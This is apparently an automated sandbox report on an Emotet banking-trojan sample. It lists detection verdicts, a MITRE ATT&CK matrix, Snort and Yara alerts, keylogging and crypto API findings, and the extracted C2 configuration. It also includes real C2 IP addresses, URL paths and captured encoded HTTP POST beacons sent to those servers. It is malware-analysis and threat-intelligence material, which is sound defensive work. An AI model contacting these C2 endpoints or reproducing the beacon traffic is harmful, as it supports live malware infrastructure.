Loading ...

Play interactive tourEdit tour

Analysis Report pM54o4Q47b

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:211726
Start date:28.02.2020
Start time:09:35:03
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 14m 0s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:pM54o4Q47b (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:15
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@7/1@1/13
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 96.4% (good quality ratio 93%)
  • Quality average: 83.5%
  • Quality standard deviation: 25.8%
HCA Information:
  • Successful, ratio: 78%
  • Number of executed functions: 69
  • Number of non-executed functions: 336
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, SIHClient.exe, MusNotifyIcon.exe, conhost.exe, backgroundTaskHost.exe, CompatTelRunner.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 13.68.93.109, 52.156.204.185, 13.107.4.50, 205.185.216.10, 205.185.216.42, 104.125.13.142, 2.21.50.224, 67.26.137.254, 67.26.83.254, 8.253.204.120, 8.241.9.126, 8.241.123.254, 2.23.154.32, 2.23.154.17, 8.253.95.120, 8.253.207.121, 8.248.123.254, 8.241.78.126, 8.241.79.254, 8.248.131.254, 8.241.91.126, 8.253.204.121, 8.241.89.126, 8.241.90.254, 67.26.139.254, 8.248.113.254, 8.241.9.254, 8.241.122.126, 8.253.95.121, 8.253.204.249
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, sls.update.microsoft.com.akadns.net, tile-service.weather.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, Edge-Prod-FRA.env.au.au-msedge.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, e15275.g.akamaiedge.net, afdap.au.au-msedge.net, cdn.onenote.net.edgekey.net, settingsfd-geo.trafficmanager.net, sls.emea.update.microsoft.com.akadns.net, au.au-msedge.net, wildcard.weather.microsoft.com.edgekey.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, sls.update.microsoft.com, e1553.dspg.akamaiedge.net, au.c-0001.c-msedge.net, elasticShed.au.au-msedge.net, auto.au.download.windowsupdate.com.c.footprint.net
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Execution through API111Hidden Files and Directories1Valid Accounts1Software Packing1Input Capture1System Time Discovery1Remote File Copy3Input Capture1Data Encrypted11Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaCommand-Line Interface2Valid Accounts1Access Token Manipulation1Deobfuscate/Decode Files or Information1Network SniffingSecurity Software Discovery121Remote ServicesData from Removable MediaExfiltration Over Other Network MediumRemote File Copy3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesService Execution12Modify Existing Service11Process Injection1File Deletion1Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Cryptographic Protocol22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskNew Service2New Service2Obfuscated Files or Information2Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Non-Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading121Account ManipulationSystem Information Discovery34Shared WebrootData StagedScheduled TransferStandard Application Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceHidden Files and Directories1Brute ForceVirtualization/Sandbox Evasion12Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskValid Accounts1Two-Factor Authentication InterceptionProcess Discovery2Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionVirtualization/Sandbox Evasion12Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessAccess Token Manipulation1Input PromptRemote System Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationProcess Injection1KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact
Hardware AdditionsExecution through APIFile System Permissions WeaknessValid AccountsDLL Side-Loading1Private KeysSecurity Software DiscoveryReplication Through Removable MediaVideo CaptureStandard Application Layer ProtocolCommunication Through Removable MediaDisk Structure Wipe

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for sampleShow sources
Source: pM54o4Q47b.exeAvira: detection malicious, Label: TR/AD.Emotet.dcjla
Found malware configurationShow sources
Source: rdsmethods.exe.2836.3.memstrMalware Configuration Extractor: Emotet {"C2 list": ["50.116.86.205/srvc"]}
Multi AV Scanner detection for submitted fileShow sources
Source: pM54o4Q47b.exeVirustotal: Detection: 76%Perma Link
Source: pM54o4Q47b.exeReversingLabs: Detection: 80%
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 0.0.pM54o4Q47b.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dcjla
Source: 1.0.pM54o4Q47b.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dcjla
Source: 3.0.rdsmethods.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dcjla
Source: 2.0.rdsmethods.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.dcjla

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,3_2_00E6207B
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,3_2_00E61FFC
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,3_2_00E61F75
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61F11 CryptExportKey,3_2_00E61F11
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61F56 CryptGetHashParam,3_2_00E61F56
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,3_2_00E6215A

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00427F56
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00427F56 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,1_2_00427F56

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.7:49833 -> 206.81.10.215:8080
Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.7:49835 -> 200.71.148.138:8080
Source: TrafficSnort IDS: 2404318 ET CNC Feodo Tracker Reported CnC Server TCP group 10 192.168.2.7:49837 -> 189.209.217.49:80
Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.7:49838 -> 115.78.95.230:443
Source: TrafficSnort IDS: 2404320 ET CNC Feodo Tracker Reported CnC Server TCP group 11 192.168.2.7:49840 -> 190.147.215.53:22
Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.7:49841 -> 31.12.67.62:7080
Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.7:49843 -> 50.116.86.205:8080
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.7:49832 -> 51.68.220.244:8080
Source: global trafficTCP traffic: 192.168.2.7:49833 -> 206.81.10.215:8080
Source: global trafficTCP traffic: 192.168.2.7:49834 -> 206.189.112.148:8080
Source: global trafficTCP traffic: 192.168.2.7:49835 -> 200.71.148.138:8080
Source: global trafficTCP traffic: 192.168.2.7:49841 -> 31.12.67.62:7080
Source: global trafficTCP traffic: 192.168.2.7:49843 -> 50.116.86.205:8080
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /rtm/teapot/ HTTP/1.1Referer: http://51.68.220.244/rtm/teapot/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.68.220.244:8080Content-Length: 676Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /scripts/rtm/xian/ HTTP/1.1Referer: http://206.81.10.215/scripts/rtm/xian/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 206.81.10.215:8080Content-Length: 625Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: POST /pnp/ HTTP/1.1Referer: http://206.189.112.148/pnp/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 206.189.112.148:8080Content-Length: 613Connection: Keep-AliveCache-Control: no-cacheData Raw: 57 46 63 48 3d 48 41 57 5a 6f 5a 41 69 32 64 34 54 6a 58 51 76 58 37 44 35 54 31 71 51 37 71 6d 49 54 39 50 7a 31 37 55 6e 6f 7a 55 37 7a 4c 51 6e 54 4d 31 52 5a 66 61 55 6b 48 69 6f 48 48 6d 48 34 53 68 65 71 62 6f 50 32 5a 4d 32 55 38 50 30 58 6e 4b 39 6e 79 6d 79 6d 4d 74 33 6e 7a 45 78 55 48 73 34 35 74 77 44 4e 58 61 74 67 44 46 4b 32 37 6b 42 68 59 64 62 38 6f 59 36 56 4b 77 4b 47 76 48 31 6d 62 48 73 6d 78 58 68 54 38 78 4a 67 5a 25 32 42 57 74 79 4d 72 45 43 61 50 33 4f 76 56 61 4e 41 57 6c 72 54 74 52 6b 25 32 46 67 65 54 6c 63 38 36 77 64 52 79 73 37 58 69 6d 50 50 42 49 43 6a 54 39 69 66 57 47 31 66 46 65 33 6b 78 65 64 33 63 6e 67 44 6b 64 34 7a 42 54 42 6a 72 25 32 42 31 59 36 6a 55 37 4a 4c 74 78 41 45 63 4a 6d 53 42 33 51 25 32 42 49 31 4a 50 39 54 32 71 55 75 65 53 61 36 32 6b 37 4c 68 59 75 78 48 65 53 4c 46 72 48 31 25 32 42 75 49 64 43 56 6c 6f 58 48 68 63 32 78 53 73 72 42 38 71 49 77 5a 58 25 32 46 38 47 4d 33 59 30 35 69 69 46 6c 38 52 69 52 44 7a 47 43 45 35 32 77 65 33 64 48 50 62 39 31 69 6b 56 6e 6e 44 34 4f 46 4f 4f 67 33 38 57 78 47 4c 43 55 43 79 51 25 32 46 71 39 51 46 6f 62 30 25 32 42 47 33 30 4f 70 75 75 44 64 4b 44 79 43 53 58 4a 30 4e 4e 35 67 51 47 6b 4d 55 43 51 46 48 4e 49 6a 62 56 52 4c 6a 73 4f 56 37 46 49 43 70 76 37 5a 48 6e 6a 4d 69 6f 32 58 74 61 67 41 57 4a 30 67 71 6c 46 4e 58 33 53 74 6b 6c 6e 5a 30 37 66 66 63 61 4a 5a 34 45 56 44 4e 37 6d 41 38 51 4d 75 72 53 77 54 41 75 37 77 61 42 70 6d 46 59 7a 70 5a 68 65 49 41 6f 79 51 35 50 63 78 70 33 66 69 30 43 38 59 4a 74 25 32 42 45 30 52 42 61 6f 74 47 43 63 52 49 63 63 4d 53 43 39 7a 52 59 73 4d 5a 34 44 4a 31 76 5a 4c 79 63 25 32 46 4f 65 66 51 4a 43 6e 65 68 61 35 6f 38 43 42 39 57 37 48 75 78 57 6d 51 48 75 45 50 50 72 63 64 34 76 35 39 6c 58 59 79 37 30 6a 6c 64 45 33 56 65 73 71 6c 72 66 51 25 33 44 25 33 44 Data Ascii: WFcH=HAWZoZAi2d4TjXQvX7D5T1qQ7qmIT9Pz17UnozU7zLQnTM1RZfaUkHioHHmH4SheqboP2ZM2U8P0XnK9nymymMt3nzExUHs45twDNXatgDFK27kBhYdb8oY6VKwKGvH1mbHsmxXhT8xJgZ%2BWtyMrECaP3OvVaNAWlrTtRk%2FgeTlc86wdRys7XimPPBICjT9ifWG1fFe3kxed3cngDkd4zBTBjr%2B1Y6jU7JLtxAEcJmSB3Q%2BI1JP9T2qUueSa62k7LhYuxHeSLFrH1%2BuIdCVloXHhc2xSsrB8qIwZX%2F8GM3Y05iiFl8RiRDzGCE52we3dHPb91ikVnnD4OFOOg38WxGLCUCyQ%2Fq9QFob0%2BG30OpuuDdKDyCSXJ0NN5gQGkMUCQFHNIjbVRLjsOV7FICpv7ZHnjMio2XtagAWJ0gqlFNX3StklnZ07ffcaJZ4EVDN7mA8QMurSwTAu7waBpmFYzpZheIAoyQ5Pcxp3fi0C8YJt%2BE0RBaotGCcRIccMSC9zRYsMZ4DJ1vZLyc%2FOefQJCneha5o8CB9W7HuxWmQHuEPPrcd4v59lXYy70jldE3VesqlrfQ%3D%3D
Source: global trafficHTTP traffic detected: POST /srvc/enabled/xian/ HTTP/1.1Referer: http://50.116.86.205/srvc/enabled/xian/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 50.116.86.205:8080Content-Length: 579Connection: Keep-AliveCache-Control: no-cacheData Raw: 68 50 6f 4b 6f 77 32 68 44 55 3d 4c 38 58 4a 45 48 72 4a 54 6f 70 7a 6d 76 6b 50 73 6a 6d 6e 4d 6c 25 32 42 42 33 77 4e 49 45 75 67 53 70 41 75 47 78 4c 52 72 63 49 57 38 5a 70 4a 59 50 31 69 54 69 32 74 61 74 47 63 43 43 39 46 58 4c 76 76 74 53 74 34 45 31 39 6b 38 53 25 32 46 62 4a 45 25 32 42 43 50 6e 50 76 6a 5a 43 65 44 73 57 35 48 32 47 47 45 6e 69 57 35 6e 4c 64 66 35 62 74 74 56 48 44 5a 5a 39 25 32 42 56 4d 58 70 4c 63 53 48 72 70 74 61 31 50 31 32 78 4e 75 51 33 69 44 59 50 4d 54 4f 53 75 45 42 4f 64 37 4e 67 55 55 32 6a 66 72 62 45 7a 4c 5a 45 66 76 25 32 46 31 32 33 61 6b 49 65 48 64 7a 63 6e 64 76 70 54 4f 4f 58 70 79 6b 4c 56 6c 4a 4c 48 38 54 38 38 69 6e 49 36 74 79 33 25 32 46 62 47 37 25 32 46 59 78 6a 66 63 6f 73 49 5a 4a 57 61 6a 35 4f 42 6b 75 65 52 25 32 42 4d 75 72 68 63 61 34 58 49 70 63 6d 75 58 77 70 4e 59 44 6e 43 50 38 36 4a 25 32 46 64 45 63 33 54 4b 57 74 6c 68 56 74 52 79 42 77 50 37 64 45 52 46 39 34 77 44 6e 39 31 59 70 55 4d 44 39 73 53 51 49 67 74 31 64 76 48 6e 47 6f 45 6e 67 64 51 31 59 51 30 34 77 74 6c 78 69 6a 25 32 42 62 61 62 68 57 66 56 31 47 65 6c 58 47 66 54 4b 76 4f 75 51 59 43 25 32 42 7a 54 73 53 74 5a 33 62 48 30 4e 32 4c 44 53 4d 38 54 34 61 51 4a 63 4c 61 59 59 49 73 32 67 6c 75 43 54 37 4c 58 58 59 72 4f 4c 6f 4f 32 69 47 48 4a 47 77 67 38 65 36 4b 45 53 4b 35 76 34 35 53 46 68 41 4a 67 66 56 47 30 70 68 49 41 72 73 79 4b 56 6c 42 66 73 6f 44 57 46 48 62 68 78 39 77 70 31 78 48 54 47 49 63 75 70 66 63 48 4e 6f 42 4e 64 52 7a 71 79 32 67 32 33 34 25 32 46 56 39 42 73 43 76 61 58 63 30 61 53 63 36 32 6f 75 64 33 79 69 74 52 66 38 42 4a 31 49 5a 61 46 78 43 44 4f 46 4d 6c 71 43 6a 33 7a 45 67 25 32 46 62 33 72 39 4b 46 6d 46 6d 49 5a 56 41 4a 51 31 4d 25 33 44 Data Ascii: hPoKow2hDU=L8XJEHrJTopzmvkPsjmnMl%2BB3wNIEugSpAuGxLRrcIW8ZpJYP1iTi2tatGcCC9FXLvvtSt4E19k8S%2FbJE%2BCPnPvjZCeDsW5H2GGEniW5nLdf5bttVHDZZ9%2BVMXpLcSHrpta1P12xNuQ3iDYPMTOSuEBOd7NgUU2jfrbEzLZEfv%2F123akIeHdzcndvpTOOXpykLVlJLH8T88inI6ty3%2FbG7%2FYxjfcosIZJWaj5OBkueR%2BMurhca4XIpcmuXwpNYDnCP86J%2FdEc3TKWtlhVtRyBwP7dERF94wDn91YpUMD9sSQIgt1dvHnGoEngdQ1YQ04wtlxij%2BbabhWfV1GelXGfTKvOuQYC%2BzTsStZ3bH0N2LDSM8T4aQJcLaYYIs2gluCT7LXXYrOLoO2iGHJGwg8e6KESK5v45SFhAJgfVG0phIArsyKVlBfsoDWFHbhx9wp1xHTGIcupfcHNoBNdRzqy2g234%2FV9BsCvaXc0aSc62oud3yitRf8BJ1IZaFxCDOFMlqCj3zEg%2Fb3r9KFmFmIZVAJQ1M%3D
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.64
Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.64
Source: unknownTCP traffic detected without corresponding DNS query: 185.234.72.64
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 51.68.220.244
Source: unknownTCP traffic detected without corresponding DNS query: 206.189.112.148
Source: unknownTCP traffic detected without corresponding DNS query: 206.189.112.148
Source: unknownTCP traffic detected without corresponding DNS query: 206.189.112.148
Source: unknownTCP traffic detected without corresponding DNS query: 200.71.148.138
Source: unknownTCP traffic detected without corresponding DNS query: 200.71.148.138
Source: unknownTCP traffic detected without corresponding DNS query: 200.71.148.138
Source: unknownTCP traffic detected without corresponding DNS query: 192.81.213.192
Source: unknownTCP traffic detected without corresponding DNS query: 192.81.213.192
Source: unknownTCP traffic detected without corresponding DNS query: 192.81.213.192
Source: unknownTCP traffic detected without corresponding DNS query: 189.209.217.49
Source: unknownTCP traffic detected without corresponding DNS query: 189.209.217.49
Source: unknownTCP traffic detected without corresponding DNS query: 189.209.217.49
Source: unknownTCP traffic detected without corresponding DNS query: 115.78.95.230
Source: unknownTCP traffic detected without corresponding DNS query: 115.78.95.230
Source: unknownTCP traffic detected without corresponding DNS query: 115.78.95.230
Source: unknownTCP traffic detected without corresponding DNS query: 94.192.228.255
Source: unknownTCP traffic detected without corresponding DNS query: 94.192.228.255
Source: unknownTCP traffic detected without corresponding DNS query: 94.192.228.255
Source: unknownTCP traffic detected without corresponding DNS query: 190.147.215.53
Source: unknownTCP traffic detected without corresponding DNS query: 190.147.215.53
Source: unknownTCP traffic detected without corresponding DNS query: 190.147.215.53
Source: unknownTCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknownTCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknownTCP traffic detected without corresponding DNS query: 31.12.67.62
Source: unknownTCP traffic detected without corresponding DNS query: 31.31.77.83
Source: unknownTCP traffic detected without corresponding DNS query: 31.31.77.83
Source: unknownTCP traffic detected without corresponding DNS query: 31.31.77.83
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.86.205
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.86.205
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.86.205
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.86.205
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.86.205
Source: unknownTCP traffic detected without corresponding DNS query: 50.116.86.205
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E61383 InternetReadFile,3_2_00E61383
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: cdn.onenote.net
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /rtm/teapot/ HTTP/1.1Referer: http://51.68.220.244/rtm/teapot/Content-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 51.68.220.244:8080Content-Length: 676Connection: Keep-AliveCache-Control: no-cache
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Feb 2020 08:37:40 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Urls found in memory or binary dataShow sources
Source: rdsmethods.exe, 00000003.00000002.2915021161.0000000000199000.00000004.00000001.sdmpString found in binary or memory: http://50.116.86.205/srvc/enabled/xian/
Source: svchost.exe, 00000008.00000002.1534469854.0000017881DB0000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_004262B3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_004262B3
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 0_2_00422DAF GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00422DAF
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_004262B3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_004262B3
Source: C:\Users\user\Desktop\pM54o4Q47b.exeCode function: 1_2_00422DAF GetKeyState,GetKeyState,GetKeyState,GetKeyState,1_2_00422DAF

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\rdsmethods.exeCode function: 3_2_00E6CE153_2_00E6CE15
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000002.00000002.1238492683.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1239429666.0000000000EB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.1244085000.0000000000621000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1207968367.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2915763997.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2915815200.0000000000E61000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000001.00000002.1244031414.0000000000610000.00000040.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
